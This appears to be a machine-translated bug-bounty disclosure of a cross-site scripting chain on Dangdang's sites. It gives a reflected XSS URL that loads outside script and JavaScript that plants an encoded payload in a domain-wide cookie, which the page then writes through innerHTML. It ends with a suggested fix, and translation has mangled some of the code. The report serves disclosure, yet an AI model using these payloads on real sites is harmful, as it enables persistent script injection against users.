1. Is the XSS reflection in the second-level or third-level domain very weak? 2. Can only xx xss be better? (For example, you can change the user-agent dialog box, you know) 1 + 2 = storing XSS in all domains. It's just for fun ~~ Detailed Description: 1. after logging on to Dangdang, the user nickname and number of shopping carts at the top of the page are read and loaded by js from the COOKIE. Counterfeit cookies can form a storage-type XSS (in almost all fields, even if the user does not log on or exit, the number of shopping cart in the COOKIE is not affected. In this example, XSS is valid until January 1, 2020, and the viewer can adjust it by taste ). 2. find the next reflection XSS in the mobile phone Dangdang and load the js Code that changes the number of shopping cart in the COOKIE. http://m.dangdang.com/touch/leavemsg.php?sid=3d41%22%3E%3Cscript%20src=http://localhost/test/dd.js%3E%3C/script%3E%3C%22dd.js Code: document. cookie = "response = % u003c % u0069 % u006d % u0067 % u0020 % u0073 % u0072 % u0063 % u003d % u0031 % u0020 % response % u0065 % u0072 % u0072 % response % u0072 % u003d % u0061 % u006c % u0065 % u0072 % u0074 % u0028 % u0031 % u0029 % u003e; domain = dangdang.com; Path =/; expires = "+ new Date (). toGMTString (). replace ('20140901', '20140901'); location. href =" http://www.dangdang.com "; Dangdang parses the js part of the COOKIE: http://www.dangdang.com /Found/pagetop_2012.js if (usernick = "") {xinshou = "<a name = \" dl \ "href = \" java "+" scr "+" ept: pageTopLogIn (); \ "target = \" _ self \ "class = \" login_link \ "> logon </a> <a name = \" zc \ "href = \" java "+" scr "+" ept: pageTopRegist (); \ "target = \" _ self \ "class = \" login_link \ "> free registration </a> ";} else {chakanlk = "[<a name = \" tc \ "href = \" java "+" scr "+" ipt: PageTopSignOut (); \ "target = \" _ self \ "> log out </a>]"; xinshou = ""; var cartItemsCount = GetCookie_one ("cart_items_count", ""); if (cartItemsCount! = Null & cartItemsCount. length> 0 & cartItemsCount! = "Undefined") {var cic = document. getElementById ("cart_items_count"); if (cic! = '') {Cic. innerHTML = "(" + cartItemsCount + ")"; // at this location, the value in the COOKIE is read and output directly on the page, resulting in XSS }}}
Video sense ~~
Password: ddxssSolution:
Cic. innerHTML = "(" + cartItemsCount + ")"; and other related locations are filtered again, or not read from cookies.